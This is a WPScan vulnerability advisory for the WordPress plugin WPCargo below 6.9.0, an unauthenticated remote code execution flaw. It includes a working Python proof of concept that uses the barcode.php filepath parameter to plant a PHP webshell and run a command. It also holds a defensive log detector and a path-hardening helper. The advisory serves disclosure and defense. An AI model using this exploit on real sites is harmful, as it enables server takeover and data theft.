WPCargo < 6.9.0 - Unauthenticated RCE

Source: wpvulndb (wpscan.com)
Author: Krzysztof Zając
WPVDB-ID: 5C21AD35-B2FB-4A51-858F-8FFFF685DE4A
Published: Feb 21, 2022 - 12:00 a.m.
EPSS: 0.612 (Medium), percentile 97.8%

The plugin contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.

PoC

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause a PHP snippet to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'


def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')


text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system",
    data={"2": cmd}
).content.decode('ascii', 'ignore'))
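The weakness the PoC relies on is that barcode.php takes the output path of the rendered PNG from the request (the filepath parameter) and writes it wherever it is told. The following is an added example written for this page, not code from the advisory or from the WPCargo project: it scans constructed access-log lines for requests to that endpoint carrying a caller-chosen filepath (flagging script extensions and absolute or traversing paths), and shows a generic path-confinement check of the kind a fix would need. The log layout, the sample IPs and the helper names are assumptions.

```python
import re
from pathlib import Path, PurePosixPath
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names are taken from the advisory's PoC above.
VULN_ENDPOINT = "/wp-content/plugins/wpcargo/includes/barcode.php"
SCRIPT_SUFFIXES = {".php", ".phtml", ".phar", ".php5", ".php7"}

# Assumed "combined" access-log layout; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(target: str) -> Optional[dict]:
    """Flag a request to barcode.php that carries a caller-chosen filepath.

    Returns None for anything else. Any filepath on this endpoint deserves a
    look, since the endpoint writes wherever it is told; a script extension or
    an absolute/traversing path raises the severity to high.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_ENDPOINT):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filepath")
    if not values:
        return None
    filepath = values[0]  # parse_qs has already percent-decoded the value
    reasons = []
    if PurePosixPath(filepath).suffix.lower() in SCRIPT_SUFFIXES:
        reasons.append("script_extension")
    if filepath.startswith("/") or ".." in PurePosixPath(filepath).parts:
        reasons.append("absolute_or_traversal")
    return {
        "filepath": filepath,
        "reasons": reasons,
        "severity": "high" if reasons else "medium",
    }


def scan_log(lines: List[str]) -> List[dict]:
    """Run analyse_request over raw access-log lines and collect findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], status=m["status"])
            findings.append(finding)
    return findings


def safe_output_path(base_dir: str, requested: str) -> Optional[str]:
    """Generic hardening illustration (assumed, not the vendor's fix): accept
    only a bare .png file name and place it under base_dir, so the caller can
    choose neither the directory nor the extension."""
    name = PurePosixPath(requested).name
    if name != requested or name.startswith(".") or not name.lower().endswith(".png"):
        return None
    base = Path(base_dir).resolve()
    candidate = (base / name).resolve()
    if candidate.parent != base:
        return None
    return str(candidate)


# Constructed sample log lines (not real traffic); the first mirrors the PoC request.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Feb/2022:10:15:32 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php'
    '?text=1x1x1&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 512 "-" "python-requests/2.27.1"',
    '198.51.100.4 - - [21/Feb/2022:10:16:01 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php'
    '?text=1x1x1&size=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Feb/2022:10:16:09 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php'
    '?text=1x1x1&size=2&filepath=label.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Feb/2022:10:16:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["filepath"], ",".join(f["reasons"]) or "-")
```

The detector treats the mere presence of filepath on this endpoint as a medium finding because, per the advisory, the endpoint writes wherever that parameter points; the hardening helper shows the shape of the missing control (fixed directory, fixed extension, no directory components), which is what removes the attacker's choice of target path.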

Affected versions (CPE)

Name      Operator  Version
wpcargo   lt        6.9.0
